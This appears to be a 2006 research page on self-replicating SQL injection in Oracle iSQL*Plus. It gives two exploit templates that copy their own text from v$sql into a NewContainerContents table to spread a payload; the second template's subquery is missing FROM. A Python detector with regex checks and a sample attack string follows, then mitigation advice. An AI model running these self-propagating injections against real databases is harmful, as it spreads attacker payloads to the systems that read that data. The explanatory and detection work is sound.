
SQL Virus Using Self-Referential Queries for Oracle (iSQL*Plus)


On Oracle, the following code performs the attack when run through iSQL*Plus:
%content%';linebreak
UPDATE NewContainerContents SET ContainerContents=ContainerContents || ';' || CHR(10) || (SELECT SQL_TEXT FROM v$sql WHERE INSTR(SQL_TEXT,'%payload%')>0);
Exploit 1 - Oracle (iSQL*Plus) exploit using multiple queries
Note that the first linebreak is the only significant one; the others are introduced for readability.
In the above example, the payload can be a script insertion or SSI attack. The payload serves two purposes: it is the attack itself, and it is the marker used to select the proper query from the v$sql view. As a result, the attack fails if multiple instances run at the same time, because the SELECT query then returns multiple values.

Exploit 2 shows a more reliable Oracle exploit, but it is considerably larger.

%content%';linebreak
UPDATE NewContainerContents SET ContainerContents=ContainerContents || ';' || CHR(10) || (SELECT SQL_TEXT v$sql sql, v$session ses, v$mystat sta WHERE sql.sql_id=ses.sql_id AND ses.sid=sta.sid AND sta.STATISTIC#=0) || ';' || CHR(10) || '%payload%'; linebreak
%payload%
Exploit 2 - Reliable Oracle (iSQL*Plus) exploit using multiple queries
In this case, the payload must be included twice: once to copy it and once to execute it. This example allows SQL injection attacks.
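
A defensive check for the pattern both exploits share, as an added example that is not part of the original page: a stored value that closes its string literal, starts a new statement after a line break, and reads statement text back from Oracle's dynamic performance views. The function names, field names and sample values are constructed for illustration.

```python
import re

# A quote closing the string literal, then ';' and a line break. The page notes
# that this first line break is the significant one under iSQL*Plus.
STATEMENT_BREAK = re.compile(r"'\s*;[ \t]*\r?\n")
# Oracle dynamic performance views (v$sql, v$session, v$mystat, and gv$ forms).
DYNAMIC_VIEW = re.compile(r"\bg?v\$\w+", re.IGNORECASE)
# The column both exploits read to recover the text of the running statement.
SQL_TEXT_COLUMN = re.compile(r"\bSQL_TEXT\b", re.IGNORECASE)

CHECKS = (
    ("statement-break", STATEMENT_BREAK),
    ("dynamic-view-reference", DYNAMIC_VIEW),
    ("sql-text-column", SQL_TEXT_COLUMN),
)

def inspect_value(value):
    """Return the names of the checks that match one stored field value."""
    return [name for name, pattern in CHECKS if pattern.search(value)]

def is_self_referential(value):
    """True when a value both breaks out of its statement and reads SQL text."""
    found = set(inspect_value(value))
    return "statement-break" in found and bool(
        found & {"dynamic-view-reference", "sql-text-column"})

def scan(values):
    """Map each flagged field name to its findings; clean fields are omitted."""
    report = {}
    for field, value in values.items():
        findings = inspect_value(value)
        if findings:
            report[field] = findings
    return report

# Constructed sample values (hypothetical field names, placeholder payload).
SAMPLES = {
    "tag-001": "Apples, crate 12",
    "tag-002": "O'Brien's pears; batch 7",
    "tag-003": "Apples';\nUPDATE NewContainerContents SET ContainerContents="
               "ContainerContents || (SELECT SQL_TEXT FROM v$sql WHERE "
               "INSTR(SQL_TEXT,'<payload-placeholder>')>0);",
}

if __name__ == "__main__":
    for field, findings in scan(SAMPLES).items():
        print(field, findings, "self-referential:", is_self_referential(SAMPLES[field]))
```

Treat a match as a detection signal, not as the fix: bind variables and an application account with no SELECT privilege on the V$ views remove the conditions both exploits depend on.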


Last modified: Thursday, 02 March 2006 18:10, CET